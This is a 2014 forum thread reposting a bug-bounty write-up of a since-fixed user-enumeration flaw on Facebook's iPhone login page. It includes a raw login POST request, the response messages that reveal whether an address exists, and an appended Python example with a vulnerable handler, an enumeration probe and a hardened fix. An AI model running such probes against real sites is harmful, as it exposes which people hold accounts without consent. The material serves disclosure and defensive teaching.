florin_darck Posted February 17, 2014

Facebook User Enumeration Vulnerability By Bypassing Brute Force Protection
==============================
Bug Status - Reported On 3-5-2013, Fixed On 12-6-2013
Reward - $1000
=============================

Before that, if you don't know about the User Enumeration vulnerability, see below.

User Enumeration is a technique or vulnerability which can allow an attacker to enumerate all emails, user names or sensitive information about any user which already exists in the target vulnerable web application.

So let's move to the testing part. If I say something about myself: I didn't try for XSS, CSRF or any other common bug; I always try to find some logical or unique bugs. So I was searching for this type of bug in iphone.facebook.com, which is a special version for iPhone users where they can browse FB on their iPhone.

Now here is where the interesting part came. You all know that every web application has its "forgot your password" and registration forms, where users can reset their password and create a new account. Let's think about what an attacker can do with these two forms... Hmmm. Yes, he can check which email addresses already exist in that web application by performing a mass brute force attack.

So I tried to perform this attack on the iphone.facebook.com and m.facebook.com "forgot your password" forms, but as everyone knows Facebook has its internal brute force detection mechanism, so no one can easily perform this type of attack. As a result of this attack I found that after 10 attempts Facebook was blocking my requests, so I was unable to perform this attack here. I tried to bypass it but didn't get anything there.

Then finally I found a flaw of improper request handling in the iphone.facebook.com login panel for users.

http://1.bp.blogspot.com/-bNNKQenh-2Y/UqU9yFIr7aI/AAAAAAAAAoQ/JQTiOHU6syo/s1600/POC+1.jpg

Like in a normal web application, if you enter only the email without giving a password, the web application will give you an error like "Please Enter Email & Password" or "You Entered An Invalid Email Or Password". But in iphone.facebook.com there is some mistake in the request & response. If I enter only the email in the login panel without giving a password, I get the error "We didn't recognize your email address".

Hmmm. That means we can enumerate all existing email addresses, but maybe Facebook can also block our requests like it did last time. But this time, instead of blocking my requests, it is giving me a "Different Response Code For Existing Or Non Existing Email Id": 200 for non-existing and 302 for existing emails.

http://4.bp.blogspot.com/-ajYYfaFTV_o/UqL8hjsN0wI/AAAAAAAAAnM/fssvqe4zdn8/s1600/POC+4.jpg
POC

But one thing is still in mind: how is it possible that Facebook's brute force mechanism failed to detect my attempts? Because Facebook had forgotten to add the brute force mechanism on this particular login page, that's why I am able to perform this kind of attack here.

Now the bug is fixed.

Source: Web And Information Security
Maximus Posted February 17, 2014

Host: iphone.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://iphone.facebook.com/login.php?refsrc=https%3A%2F%2Fiphone.facebook.com%2F&refid=9&e=1348028&email=snoop_sssad%40yahoo.com&signup_layout=layout%7Clower_subdued_button%7C%7Cs_btn%7Cspecial%7C%7Cl_btn%7Cconfirm%7C%7Csignupinstr%7C%7Clogininstr%7C%7Cst%7Ccreate%7C%7Claunched_Jan9&li=5wgCU1xZ4nhIM-Ad4b_WiSQK&_rdr
Cookie: datr=rv7lUj4TLFlhAWGlHvS9xvcC; fr=0CX1ISfPWgHY98GtH.AWW21Ok89H0jKJ-AHRjFqvfyWjw.BS5f65.Hr.FMB.AWXndWPa; lu=TA25WbjfGRRCk4ptWyoz70KA; locale=en_US; reg_fb_gate=http%3A%2F%2Fiphone.facebook.com%2F; reg_fb_ref=https%3A%2F%2Fiphone.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fiphone.facebook.com%252F%26refid%3D9%26e%3D1348028%26email%3Dsnoop_sssad%2540yahoo.com%26signup_layout%3Dlayout%257Clower_subdued_button%257C%257Cs_btn%257Cspecial%257C%257Cl_btn%257Cconfirm%257C%257Csignupinstr%257C%257Clogininstr%257C%257Cst%257Ccreate%257C%257Claunched_Jan9%26li%3D5wgCU1xZ4nhIM-Ad4b_WiSQK; m_ts=1392642569; sfiu=AYjAEYnDRFu1ODLJXhzRo2R_qdcLthL7thmlJVinxvzMKied5NqQ8RhEUsWygYC16lJZeuhomQwo5gg8jL9RQVC3Bu9Vz0owCfflGcI3u3xpKUFk8KDugUWdKuaSikjbZFHsTfJBMHdjmrc-rvjWkONIq0Fbfo1vQNNv9lJCgKruqQ
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 380

post content:
lsd=AVrRrtFU&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&version=1&ajax=0&width=0&pxr=0&gps=0&signup_layout=layout%7Clower_subdued_button%7C%7Cs_btn%7Cspecial%7C%7Cl_btn%7Cconfirm%7C%7Csignupinstr%7C%7Clogininstr%7C%7Cst%7Ccreate%7C%7Claunched_Jan9&email=sdfdg3334f@yahoo.com&pass=&login=Log+In

We didn't recognize your email address. = invalid
Your password was incorrect. = valid
or
Alternatively, we can send you a message with a link you can use to easily login. = valid
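The oracle the two posts above describe (a different message and a different status code for existing versus non-existing addresses, on a login form with no attempt limit), modelled as an added example that is not part of this thread or of Facebook's code: a toy vulnerable handler, the probe a tester would run against it, and a hardened handler that returns one uniform failure response and counts attempts per source. The accounts, addresses, passwords, the fixed salt and the 10-attempt threshold are all constructed assumptions.

```python
"""Added example: login-form user-enumeration oracle, its probe, and a fix.
All accounts and addresses below are constructed sample data."""
import hashlib
import hmac
from collections import defaultdict
from dataclasses import dataclass

GENERIC_ERROR = "The email address or password you entered is incorrect."
UNRECOGNIZED = "We didn't recognize your email address."


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)


# Constructed sample store: email -> (salt, pbkdf2 hash). A fixed salt is an
# assumption made to keep the example deterministic; use a random one per user.
_SALT = b"constructed-fixed-salt"
ACCOUNTS = {
    "alice@example.com": (_SALT, _hash_password("correct horse", _SALT)),
    "bob@example.com": (_SALT, _hash_password("battery staple", _SALT)),
}
# Dummy credential so unknown emails cost the same hashing work as known ones.
_DUMMY = (_SALT, _hash_password("dummy", _SALT))


@dataclass(frozen=True)
class Response:
    status: int
    body: str


def vulnerable_login(email: str, password: str) -> Response:
    """Mirrors the behaviour the thread reports: unknown address -> 200 with
    'We didn't recognize...', known address with a wrong or empty password ->
    302 with 'Your password was incorrect.'  No attempt counter at all."""
    if email not in ACCOUNTS:
        return Response(200, UNRECOGNIZED)
    salt, stored = ACCOUNTS[email]
    if not hmac.compare_digest(_hash_password(password, salt), stored):
        return Response(302, "Your password was incorrect.")
    return Response(302, "Location: /home")


class HardenedLogin:
    """Same status and message for every failure, plus a per-source limit."""

    def __init__(self, max_attempts: int = 10):
        self.max_attempts = max_attempts  # assumed threshold
        self._attempts = defaultdict(int)

    def login(self, source: str, email: str, password: str) -> Response:
        if self._attempts[source] >= self.max_attempts:
            return Response(429, "Too many attempts; try again later.")
        self._attempts[source] += 1
        # Always do the hash, even for unknown emails, so response time does
        # not become the next oracle.
        salt, stored = ACCOUNTS.get(email, _DUMMY)
        ok = hmac.compare_digest(_hash_password(password, salt), stored)
        if email not in ACCOUNTS or not ok:
            return Response(200, GENERIC_ERROR)
        return Response(302, "Location: /home")


def distinct_failure_responses(login, candidates):
    """Tester's check: submit each candidate with an empty password and keep
    the distinct (status, body) pairs.  More than one pair means the form
    leaks whether the address exists."""
    return {login(email, "") for email in candidates}


def enumerate_emails(login, candidates):
    """Exploit the oracle: any address that does not get the 'unrecognized'
    response belongs to an existing account."""
    return [e for e in candidates if login(e, "") != Response(200, UNRECOGNIZED)]


CANDIDATES = ["alice@example.com", "nobody@example.com",
              "bob@example.com", "ghost@example.com"]

if __name__ == "__main__":
    print("vulnerable, distinct replies:",
          len(distinct_failure_responses(vulnerable_login, CANDIDATES)))
    print("vulnerable, enumerated:", enumerate_emails(vulnerable_login, CANDIDATES))
    hardened = HardenedLogin()
    probe = lambda e, p: hardened.login("10.0.0.1", e, p)
    print("hardened, distinct replies:",
          len(distinct_failure_responses(probe, CANDIDATES)))
```

The probe deliberately keys on the whole (status, body) pair rather than on the message alone, because the post's second signal was the status code (200 vs 302) and a fix that only rewords the message would still be caught. The hardened handler keeps the "forgot password" form's attempt limit on the login form as well, which is the control the post says was missing.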
awnly3jhc2g Posted February 17, 2014

I don't think he got $1000 for something like that.
tpad Posted February 17, 2014

That's what making a mountain out of a molehill means :).. Still, it's Facebook, they care about their image.